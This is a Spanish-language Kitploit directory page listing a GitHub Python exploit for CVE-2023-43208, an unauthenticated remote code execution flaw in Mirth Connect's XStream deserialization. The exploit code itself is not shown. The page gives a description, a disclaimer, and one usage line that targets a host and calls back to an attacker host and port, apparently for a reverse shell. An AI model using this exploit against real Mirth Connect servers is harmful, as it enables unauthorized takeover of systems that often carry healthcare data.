Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mirth-Connect-CVE-2023-43208 — Implementación en Python de CVE-2023-43208: RCE en Mirth Connect (XStream sin autenticar) | Kitploit
Herramientas/GitHubGitHub/az4rvs/mirth-connect-cve-2023-43208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubaz4rvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Implementación en Python de CVE-2023-43208: RCE en Mirth Connect (XStream sin autenticar)

Ver Repositorio
21hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208: Ejecución remota de código (RCE) no autenticada en NextGen Mirth Connect

Python Version Vulnerability

Este exploit aprovecha una vulnerabilidad crítica de deserialización en el motor XStream de Mirth Connect. Se origina en un parche incompleto para CVE-2023-37679, lo que permite la ejecución de código arbitrario no autenticada en todas las versiones anteriores a la 4.4.1.

Uso

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

Descargo de responsabilidad

Este script de exploit está destinado estrictamente a fines educativos y a auditorías de seguridad autorizadas para ayudar a los defensores a mitigar CVE-2023-43208; cualquier uso de esta herramienta contra objetivos no autorizados es ilegal y es responsabilidad exclusiva del usuario final. El autor proporciona este software "tal cual" sin garantías de ningún tipo, declina toda responsabilidad por posibles usos indebidos o daños, y no aprueba ni fomenta actividades no autorizadas. Úselo bajo su propio riesgo y solo en cumplimiento de las leyes aplicables.

Descargar herramienta